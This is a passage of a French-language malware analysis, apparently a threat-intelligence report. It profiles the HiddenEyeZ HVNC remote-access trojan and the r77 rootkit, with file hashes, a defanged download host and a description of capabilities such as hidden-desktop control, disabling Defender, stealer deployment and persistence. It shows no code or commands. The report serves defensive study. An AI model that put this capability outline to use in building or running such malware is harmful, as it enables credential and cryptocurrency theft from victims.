center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha256<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66951413\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66951413\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66951413\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ba1615c7617f148228c587ffe7607ac841fd682ba4905f4af53e18d601b84102<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9388197\" class=\"desktop-view tr_class_9388197 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_97969899\" rowspan=\"1\" colspan=\"1\" class=\"td_class_97969899\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_97969899\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ssdeep<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_61574672\" rowspan=\"1\" colspan=\"1\" class=\"td_class_61574672\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_61574672\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">3072:L6IxdMnKhwoa5riuHNTapbBgn4qBwS7YXzwIjD6ZGsp:pMnKa5rirpbGn4awS7YXzwIjuZGs<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h4>Pr\u00e9sentation du malware<\/h4>\n<p>Ce sample est celui embarqu\u00e9 et ex\u00e9cut\u00e9 par Install.exe. Cet ex\u00e9cutable est un sample du RAT HiddenEyeZ HVNC, d\u00e9velopp\u00e9, utilis\u00e9 et vendu par le groupe HiddenEyeZ.<\/p>\n<p>Ce malware est utilis\u00e9 pour voler des informations sensibles des victimes (mots de passe, fichiers personnels, portefeuilles de cryptomonnaies, etc.). Pour cela, il poss\u00e8de deux capacit\u00e9s principales :<\/p>\n<ul>\n<li>d\u00e9ployer le stealer Icarus (<em>voir la partie \u00ab\u00a0<\/em><em>Icarus\u00a0\u00bb<\/em>)\u00a0;<\/li>\n<li>donner un acc\u00e8s HVNC (Hidden VNC) qui est une fonctionnalit\u00e9 pour interagir via une interface graphique avec la machine cible. Ces interactions sont invisibles pour la victime (<em>voir la partie \u00ab\u00a0Bureau cach\u00e9\u00a0\u00bb<\/em>).<\/li>\n<\/ul>\n<h4>Description d\u00e9taill\u00e9e du malware<\/h4>\n<p>Ce malware r\u00e9cup\u00e8re ses ordres depuis son serveur de C2 dont l'adresse lui est communiqu\u00e9e par les arguments de sa ligne de commande. Les messages re\u00e7us du serveur permettent d'activer un ensemble de fonctionnalit\u00e9s :<\/p>\n<ul>\n<li>d\u00e9sactivation de Windows Defender\u00a0:\n<ul>\n<li>t\u00e9l\u00e9chargement et lancement de l'ex\u00e9cutable Highlander\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>lancement de logiciels sur un bureau cach\u00e9\u00a0:\n<ul>\n<li>navigateurs web en mettant en place du monitoring pour r\u00e9cup\u00e9rer des\u00a0donn\u00e9es\u00a0;<\/li>\n<li>clients mails\u00a0;<\/li>\n<li>\u00e9diteurs de textes\u00a0;<\/li>\n<li>logiciels de discussions (Skype, Discord, Telegram)\u00a0;<\/li>\n<li>utilitaire de portefeuilles de cryptomonnaies\u00a0;<\/li>\n<li>configuration du syst\u00e8me Windows\u00a0;<\/li>\n<li>explorateur Windows\u00a0;<\/li>\n<li>consoles (cmd et PowerShell)\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>utilisation du bureau cach\u00e9 par le cyber-attaquant\u00a0:\n<ul>\n<li>manipulation de fen\u00eatres\u00a0;<\/li>\n<li>clic sur la machine cible\u00a0;<\/li>\n<li>\u00e9criture \/ r\u00e9cup\u00e9ration des donn\u00e9es du copier \/ coller\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>r\u00e9cup\u00e9ration d'informations du syst\u00e8me (FPS, r\u00e9solution \u00e9cran) utilis\u00e9es pour le bureau\u00a0cach\u00e9\u00a0;<\/li>\n<li>arr\u00eat de processus\u00a0:\n<ul>\n<li>un processus arbitraire (PID)\u00a0;<\/li>\n<li>les navigateurs web\u00a0;<\/li>\n<li>Putty\u00a0;<\/li>\n<li>les clients mails\u00a0;<\/li>\n<li>les logiciels de discussions (Skype, Discord, Telegram)\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>t\u00e9l\u00e9chargement et lancement d'un binaire arbitraire (via Powershell)\u00a0;<\/li>\n<li>d\u00e9ploiement d'un stealer\u00a0:\n<ul>\n<li>t\u00e9l\u00e9chargement et lancement du stealer Icarus\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>mise en place de persistance (t\u00e9l\u00e9chargement et lancement d'un outil d\u00e9di\u00e9, AddStartupTask) :\n<ul>\n<li>cr\u00e9ation de t\u00e2ches planifi\u00e9es\u00a0;<\/li>\n<li>ajout de persistance pour l'ex\u00e9cutable\u00a0;<\/li>\n<\/ul>\n<\/li>\n<li>mise en place de moyens de furtivit\u00e9\u00a0:\n<ul>\n<li>t\u00e9l\u00e9chargement, d\u00e9marrage et arr\u00eat du rootkit r77 ;<\/li>\n<\/ul>\n<\/li>\n<li>auto-d\u00e9sinstallation.<\/li>\n<\/ul>\n<h5>Organisation des composants<\/h5>\n<p>Une partie des fonctionnalit\u00e9s du malware n'est pas int\u00e9gr\u00e9e dans son code source, mais d\u00e9l\u00e9gu\u00e9e \u00e0 d'autres outils qui sont t\u00e9l\u00e9charg\u00e9s et d\u00e9ploy\u00e9s \u00e0 la demande. Tous les t\u00e9l\u00e9chargements d'ex\u00e9cutables ou des biblioth\u00e8ques .NET n\u00e9cessaires \u00e0 leur ex\u00e9cution sont r\u00e9alis\u00e9s depuis le site hxxps:\/\/hiddeneyez.com\/icar\/.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414107\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 13 : listing des fichiers disponibles sur le d\u00e9p\u00f4t \/icar\/ du malware HiddenEyeZ HVNC (non exhaustif)<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h5>Outil de g\u00e9n\u00e9ration<\/h5>\n<p>Le malware HiddenEyeZ HVNC est g\u00e9n\u00e9r\u00e9 \u00e0 partir d'un builder permettant de configurer et de g\u00e9n\u00e9rer le sample du malware. De nombreuses fonctionnalit\u00e9s peuvent \u00eatre activ\u00e9es ou non suivant la volont\u00e9 de l'utilisateur.<\/p>\n<p>Voici une capture d'\u00e9cran du builder permettant de choisir les fonctionnalit\u00e9s \u00e0 incorporer dans l'ex\u00e9cutable g\u00e9n\u00e9r\u00e9.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414112\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 14 : interface du builder permettant de configurer et de g\u00e9n\u00e9rer le sample du malware HiddenEyeZ<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h5>Bureau cach\u00e9<\/h5>\n<p>Le malware HiddenEyeZ donne la possibilit\u00e9 \u00e0 l'attaquant de lancer les logiciels sur un bureau secondaire, invisible sur le poste de la victime. Cela est possible par <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/winstation\/desktops\" target=\"_blank\" rel=\"noopener\">la cr\u00e9ation d'un bureau d\u00e9di\u00e9 aux actions malveillantes<\/a>. L\u2019int\u00e9r\u00eat d'une telle fonctionnalit\u00e9 est de permettre \u00e0 l'attaquant d'ex\u00e9cuter des actions directement depuis le poste de la victime, en utilisant les informations vol\u00e9es \u00e0 la victime (logins, mots de passe, etc. ou celles d\u00e9j\u00e0 pr\u00e9sentes sur la machine comme les cookies de session, les mots de passes stock\u00e9s dans le navigateur et autres). L'adresse IP de connexion de ce poste est sans doute d\u00e9j\u00e0 connue des services distants (type banque ou cryptomonnaies) qui ne l\u00e8veront pas d'alerte pour cause de connexions suspectes ou frauduleuses, comme ce serait le cas depuis un autre ordinateur.<\/p>\n<p>Ainsi, l'attaquant peut avoir une vue graphique et y effectuer des actions sans que la victime ne s'en rende compte. Il a la capacit\u00e9 de naviguer sur le syst\u00e8me et de lancer par exemple les navigateurs et les clients mail de la victime pour y retrouver davantage d\u2019informations sensibles.<\/p>\n<p>Voici quelques captures \u00e9crans communiqu\u00e9es par les d\u00e9veloppeurs du groupe pour pr\u00e9senter la console d'administration HiddenEyeZ HVNC. On y voit par exemple des listes de logiciels pris en charge dans le bureau cach\u00e9.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414117\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_empty_space height=\"2px\"][vc_single_image image=\"414122\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 15 : captures \u00e9cran de l\u2019interface de l\u2019outil d'administration du malware HiddenEyeZ<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h5>D\u00e9ploiement du stealer Icarus<\/h5>\n<p>Ce malware HiddenEyeZ propose de d\u00e9ployer un stealer tiers qui permet de r\u00e9cup\u00e9rer automatiquement des donn\u00e9es sensibles de la victime. Ce stealer est un autre malware connu\u00a0: Icarus.<\/p>\n<p>L'extrait de code suivant montre le t\u00e9l\u00e9chargement, l'\u00e9criture, le lancement et la suppression de l'ex\u00e9cutable du stealer.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"414127\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 16 : code de d\u00e9ploiement du stealer Icarus<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Une fois l'ex\u00e9cution d'Icarus termin\u00e9e, HiddenEyeZ HVNC exfiltre l'archive contenant toutes les donn\u00e9es r\u00e9cup\u00e9r\u00e9es sur le poste de la victime.<\/p>\n<h3>r77<\/h3>\n<p>r77 est un rootkit r\u00e9cup\u00e9r\u00e9 sous les fichiers rt.jpg et remove.jpg sur hiddeneyez[.]com et sur le d\u00e9p\u00f4t Github HiddenEyeZ par le dropper et HiddenEyeZ HVNC. Ces binaires constituent l'installateur (rt.jpg) et le d\u00e9sinstallateur (remove.jpg) du rootkit dont les sources sont disponibles ici\u00a0: <a href=\"https:\/\/github.com\/bytecode77\/r77-rootkit\" target=\"_blank\" rel=\"noopener\">github.com\/bytecode77\/r77-rootkit<\/a>.<\/p>\n<p>Comme indiqu\u00e9 dans sa documentation, il s'agit d'un rootkit userland permettant de masquer\u00a0:<\/p>\n<ul>\n<li>des fichiers ou r\u00e9pertoires\u00a0;<\/li>\n<li>des processus et l'utilisation du CPU\u00a0;<\/li>\n<li>des cl\u00e9s de registres et leur valeur\u00a0;<\/li>\n<li>des services\u00a0;<\/li>\n<li>des connexions (TCP, UDP)\u00a0;<\/li>\n<li>des t\u00e2ches planifi\u00e9es\u00a0;<\/li>\n<li>des jonctions, des pipes nomm\u00e9s, et des t\u00e2ches planifi\u00e9es.<\/li>\n<\/ul>\n<p>Son analyse semble toutefois montrer qu'il s'agit ici d'une version all\u00e9g\u00e9e, puisque toutes ces fonctionnalit\u00e9s ne sont pas pr\u00e9sentes dans le sample analys\u00e9.<\/p>\n<p>Ces deux fichiers \u00e9taient pr\u00e9sents sur le d\u00e9p\u00f4t encod\u00e9 en base64 avec une extension .jpg, dans l'objectif d'\u00e9viter la d\u00e9tection via signature par les solutions de s\u00e9curit\u00e9. Nous avons donc proc\u00e9d\u00e9 \u00e0 leur d\u00e9codage avant de les analyser.<\/p>\n<h4>Installateur de r77<\/h4>\n<h5>Carte d'identit\u00e9<\/h5>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_2\"\n     id='ninja_table_builder_414274'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_2\"\n     style=\"\n     max-height:900px;\n     max-width: 800px;margin-right: auto;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_414274\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_6339902\" class=\"desktop-view tr_class_6339902 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_47180689\" rowspan=\"1\" colspan=\"1\" class=\"td_class_47180689\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_47180689\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Type of file<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_63752073\" rowspan=\"1\" colspan=\"1\" class=\"td_class_63752073\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_63752073\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">PE<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2992313\" class=\"desktop-view tr_class_2992313 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_85508872\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85508872\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85508872\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Language used<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_67647307\" rowspan=\"1\" colspan=\"1\" class=\"td_class_67647307\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_67647307\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">.NET<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7169041\" class=\"desktop-view tr_class_7169041 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_88081221\" rowspan=\"1\" colspan=\"1\" class=\"td_class_88081221\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_88081221\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Compilation date<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_23319849\" rowspan=\"1\" colspan=\"1\" class=\"td_class_23319849\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_23319849\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Wed Jul 13 17:30:36 2022<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3651020\" class=\"desktop-view tr_class_3651020 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_90964305\" rowspan=\"1\" colspan=\"1\" class=\"td_class_90964305\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_90964305\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Obfuscation<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_85405762\" rowspan=\"1\" colspan=\"1\" class=\"td_class_85405762\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_85405762\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">No<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6471413\" class=\"desktop-view tr_class_6471413 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_22731821\" rowspan=\"1\" colspan=\"1\" class=\"td_class_22731821\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_22731821\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">md5<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_27089268\" rowspan=\"1\" colspan=\"1\" class=\"td_class_27089268\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_27089268\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">a532918af845ed035c6882d6ae173d03<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_2624678\" class=\"desktop-view tr_class_2624678 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_74398198\" rowspan=\"1\" colspan=\"1\" class=\"td_class_74398198\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_74398198\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha1<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_81484118\" rowspan=\"1\" colspan=\"1\" class=\"td_class_81484118\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_81484118\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">7b0dadd2b5b6200676a7daf68f95d47319513f81<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8844292\" class=\"desktop-view tr_class_8844292 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_36997657\" rowspan=\"1\" colspan=\"1\" class=\"td_class_36997657\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_36997657\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">sha256<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66951413\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66951413\" style=\"padding: 10px; max-width: 200px; min-width: 200px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66951413\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">4604e501fb4efb5ce862e81232c61b29e4470b5313055efb291593d66f23af7e<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_9388197\" class=\"desktop-view tr_class_9388197 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_97969899\" rowspan=\"1\" colspan=\"1\" 